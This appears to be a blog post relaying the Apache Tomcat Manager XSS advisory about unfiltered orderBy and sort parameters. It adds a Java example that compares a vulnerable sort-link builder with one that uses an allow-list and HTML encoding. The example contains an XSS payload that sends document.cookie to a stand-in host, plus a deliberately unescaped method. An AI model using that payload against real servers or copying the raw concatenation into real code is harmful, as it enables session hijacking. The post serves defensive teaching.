This was announced yesterday afternoon by the Apache Tomcat team:
The session list screen (provided by sessionList.jsp) in affected
versions uses the orderBy and sort request parameters without applying
filtering and therefore is vulnerable to a cross-site scripting attack.
Users should be aware that Tomcat 6 does not use httpOnly for session
cookies by default so this vulnerability could expose session cookies
from the manager application to an attacker.
A review of the Manager application by the Apache Tomcat security team
identified additional XSS vulnerabilities if the web applications
deployed were not trusted.
The full announcement is available at TomcatExpert.com: http://www.tomcatexpert.com/blog/2010/11/22/apache-tomcat-manager-application-xss-vulnerability
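To make the escaping gap in the advisory concrete, here is an added Java example written for this post (it is not code from the Tomcat Manager application). It builds the kind of sort-toggle link sessionList.jsp emits from the orderBy and sort request parameters, first with the parameters written raw, then validated against an assumed allow-list of column names and HTML-encoded on output. The request path, the column names, the escaping helper and the attacker payload are all constructed for the example.

```java
import java.util.Arrays;
import java.util.List;

public class SessionListEscaping {

    // Assumed set of columns the session list can be sorted by. Restricting
    // orderBy to a fixed list is the validation half of the fix; encoding on
    // output is the other half, and both are applied below.
    static final List<String> ALLOWED_COLUMNS = Arrays.asList(
        "id", "CreationTime", "LastAccessedTime", "MaxInactiveInterval", "Locale");

    // Minimal HTML encoder for the characters that matter inside element text
    // and double-quoted attribute values. JDK-only so the example runs
    // stand-alone; a real webapp should use a vetted encoder library.
    static String escapeHtml(String s) {
        if (s == null) return "";
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // "Before": raw request parameters are concatenated into an href
    // attribute and into the link text, exactly the unfiltered pattern the
    // advisory describes. A value that starts with "> closes the attribute
    // and the tag, and whatever follows is parsed as markup.
    static String vulnerableSortLink(String path, String orderBy, String sort) {
        return "<a href=\"" + path + "?orderBy=" + orderBy + "&sort=" + sort + "\">"
             + orderBy + " (" + sort + ")</a>";
    }

    // "After": validate, then encode. Unknown columns fall back to a default
    // instead of being echoed, sort is constrained to the two meaningful
    // values, and every value still goes through the encoder so the output
    // stays safe even if the allow-list later gains an odd column name.
    static String hardenedSortLink(String path, String orderBy, String sort) {
        String column    = ALLOWED_COLUMNS.contains(orderBy) ? orderBy : "id";
        String direction = "DESC".equalsIgnoreCase(sort) ? "DESC" : "ASC";
        String col = escapeHtml(column);
        String dir = escapeHtml(direction);
        return "<a href=\"" + escapeHtml(path) + "?orderBy=" + col + "&amp;sort=" + dir + "\">"
             + col + " (" + dir + ")</a>";
    }

    public static void main(String[] args) {
        // Constructed attacker input: closes the href attribute and the <a>
        // element, then injects script that exfiltrates document.cookie.
        // Against a Manager whose JSESSIONID is not HttpOnly, that cookie is
        // the administrator's session.
        String payload = "\"><script>document.location='http://evil.example/?c='"
                       + "+document.cookie</script>";
        String path = "/manager/html/sessions";   // illustrative request path

        System.out.println("vulnerable: " + vulnerableSortLink(path, payload, "ASC"));
        System.out.println("hardened:   " + hardenedSortLink(path, payload, "ASC"));
        System.out.println("hardened, valid input: "
                         + hardenedSortLink(path, "LastAccessedTime", "desc"));
    }
}
```

Compile and run with `javac SessionListEscaping.java && java SessionListEscaping`. The raw form reproduces the payload's closing quote and `<script>` element inside the page; the hardened form substitutes the default column for the unrecognised value and encodes everything it writes, so nothing from the request can terminate the attribute. The advisory's point about httpOnly is the other half of the risk: a script injected this way reads document.cookie unless the session cookie carries the HttpOnly flag, which Tomcat 6 does not set by default. Tomcat 6.0.19 and later accept `useHttpOnly="true"` on the Context element in conf/context.xml to set it for session cookies; that reduces what an injected script can steal but does not remove the injection itself, so the encoding fix is still required.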